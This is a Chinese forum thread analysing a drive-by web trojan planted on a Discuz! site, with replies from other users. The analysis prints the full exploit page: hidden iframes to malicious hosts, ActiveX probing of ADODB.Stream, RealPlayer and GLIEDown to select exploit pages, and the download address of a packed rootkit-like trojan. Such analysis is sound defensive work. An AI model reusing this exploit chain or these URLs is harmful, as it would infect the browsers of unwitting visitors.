jgwy被挂网马相关分析
因为来晚了 没有第一时间获知 挂马方式未知,但从贴内大家找出的地址来看 分析如下:<iframe src=http://s82mnl12.cn/cn4.htm width=50 height=0 border=0></iframe>
cn4.htm引出<iframe src=http://s82mnl12.cn/xi/xx.htm width=50 height=0></iframe>
低部为统计流量
而xx.htm未使用任何加密方式 明文显示<script language="javaScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!=""){
document.write("<iframe width=50 height=0 src=so.htm></iframe>")}
else
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!=""){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<iframe width=0 height=100 src=sr.htm></iframe>')}
else
{
document.write('<iframe width=0 height=100 src=st.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!=""){
document.write('<iframe style=display:none src=sz.htm></iframe>')}}
}}
}
openWM();
</script>
<iframe src=http://8nnnnn99.cn/9/sf.htm width=100 height=0></iframe>
<script src='http://s127.cnzz.com/stat.php?id=755932&web_id=755932' language='JavaScript' charset='gb2312'></script>以上为自动判断式组合网马
so.htm
sr.htm
st.htm
sz.htm
sf.htm
4文件已加密 过杀毒
解密其文件,得到木马地址:http://8nnnnn99.cn/9/ck.exe 慎下
文件大小15.9K
使用多重加壳方式 内带Morphine壳 常用于加密rootkit内核病毒
该病毒行为插入explorer.exe
带EXE感染性质
写目录为C:\Program Files\HintSoft\PubwinClient\Patch
生成C:\Program Files\360Safebox\sprotect.ini
故疑为机器狗病毒
大家小心 很好我有卡吧 这个病毒应该是老版 新版能过卡巴主动防御 另
Discuz! 6.0脚本目前无最新漏洞情况
安全原因还是要多从服务器入手 :L 昨天网站挂了一次,今天又挂了一次 :L 呵这都让你分析出来了 不简单呵 :lol :lol 偶像级别啊,这玩意都能弄出来,强~ 或者是管理层密码泄露:)上次DZ 官方被黑好像就是管理层密码泄露
支持HTML 怎么的加的。。。。